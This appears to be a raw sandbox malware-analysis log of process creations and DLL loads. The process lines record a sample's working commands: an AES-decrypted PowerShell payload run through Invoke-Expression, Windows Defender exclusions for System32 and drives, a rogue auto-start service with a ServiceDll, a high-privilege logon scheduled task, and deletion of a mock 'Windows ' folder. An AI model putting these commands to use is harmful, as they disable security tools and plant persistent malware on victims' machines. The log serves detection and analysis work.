    Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
    Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start x338625
    Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
    Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
    Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.storage.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: twinui.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: wintypes.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: powrprof.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: dwmapi.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: pdh.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: umpdc.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: actxprxy.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: propsys.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.staterepositoryps.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.ui.appdefaults.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.ui.immersive.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: ntmarta.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: uiautomationcore.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: dui70.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: duser.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: dwrite.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: bcp47mrm.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: uianimation.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: d3d11.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: dxgi.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: d3d10warp.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: resourcepolicyclient.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: dxcore.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: dcomp.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: oleacc.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: edputil.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.ui.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: windowmanagementapi.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: textinputframework.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: inputhost.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: twinapi.appcore.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: coremessaging.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: twinapi.appcore.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: coreuicomponents.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: coremessaging.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: coremessaging.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: coreuicomponents.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: windowscodecs.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: thumbcache.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: policymanager.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: msvcp110_win.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: apphelp.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: appresolver.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: bcp47langs.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: slc.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: sppc.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: tiledatarepository.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: staterepository.core.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.staterepository.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: wtsapi32.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.staterepositorycore.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: mrmcorer.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: sxs.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: directmanipulation.dll
    Source: C:\Windows\System32\OpenWith.exe Section loaded: textshaping.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usosvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: updatepolicy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: upshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usocoreps.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usoapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: explorerframe.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: thumbcache.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: dataexchange.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: dxcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
